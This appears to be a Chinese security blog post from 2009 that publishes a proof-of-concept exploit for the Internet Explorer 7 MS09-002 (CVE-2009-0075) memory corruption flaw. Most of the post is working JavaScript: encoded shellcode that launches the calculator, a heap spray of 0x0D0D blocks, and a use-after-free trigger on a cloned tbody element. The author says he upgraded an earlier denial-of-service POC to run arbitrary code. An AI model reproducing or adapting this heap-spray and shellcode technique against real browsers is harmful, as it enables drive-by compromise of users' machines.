注:浏览本文杀毒软件可能会报毒,夜火的瑞星是报了,不过 IE 7 Exploit MS09-002内存破坏漏洞利用程序 的JavaScript代码是直接以文本形式贴出来的,不会运行,大家可以放心浏览
Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002) 发布时间:2009-02-10 影响版本: Microsoft Internet Explorer 7.0
漏洞描述: BUGTRAQ ID: 33627 CVE(CAN) ID: CVE-2009-0075
Comment by Friddy: 这个实际不是个破坏内存的漏洞,可以利用这个漏洞执行任意的代码。 今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC,现在已经可以较为稳定执行任意代码。
测试平台: Windows XP SP2+Internet Explorer 7.0
下面发出POC给各位安全爱好者测试,测试效果是弹出Windows的计算器(calc.exe)
1<script language="JavaScript">2var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");3
4var array = new Array();5
6var ls = 0x100000-(shellcode.length*2+0x01020);7
8var b = unescape("%u0D0D%u0D0D");9while(b.length<ls) { b+=b;}10var lh = b.substring(0,ls/2);11delete b;12
13for(i=0; i<0xD0; i++) {14array[i] = lh + shellcode;15}14 collapsed lines
16
17CollectGarbage();18
19var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");20var a1 = new Array();21for(var x=0;x<500;x++) a1.push(document.createElement("img"));22o1=document.createElement("tbody");23o1.click;24var o2 = o1.cloneNode();25o1.clearAttributes();26o1=null; CollectGarbage();27for(var x=0;x<a1.length;x++) a1[x].src=s1;28o2.click;29</script>
作者:Friddy